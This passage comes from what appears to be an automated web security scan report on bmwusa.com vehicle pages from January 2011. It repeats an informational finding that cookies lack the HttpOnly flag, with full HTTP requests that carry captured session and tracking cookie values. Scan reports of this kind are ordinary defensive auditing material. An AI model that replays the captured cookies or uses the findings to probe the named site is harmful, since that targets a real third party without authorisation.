<head id="c
...[SNIP]...

10.203. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:36:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:29 GMT;path=/
Content-Length: 217613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.204. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:18:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:35 GMT;path=/
Content-Length: 202177


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.205. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:16:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:36:14 GMT;path=/
Content-Length: 202178


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.206. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335dsedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335dsedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:15:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:19 GMT;path=/
Content-Length: 214393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.207. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:17:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:37:18 GMT;path=/
Content-Length: 225963


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.208. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:15:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:59 GMT;path=/
Content-Length: 214580


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.209. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:31:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:51:11 GMT;path=/
Content-Length: 202520


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.210. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iconvertible/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:30:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:50:32 GMT;path=/
Content-Length: 214891


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.211. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:32:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:52:06 GMT;path=/
Content-Length: 201005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.212. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:31:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:51:05 GMT;path=/
Content-Length: 216544


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.213. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:22:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:37 GMT;path=/
Content-Length: 202158


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.214. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335icoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335icoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:48 GMT;path=/
Content-Length: 214704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.215. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:22:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:43 GMT;path=/
Content-Length: 200807


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.216. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:22:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:36 GMT;path=/
Content-Length: 215578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

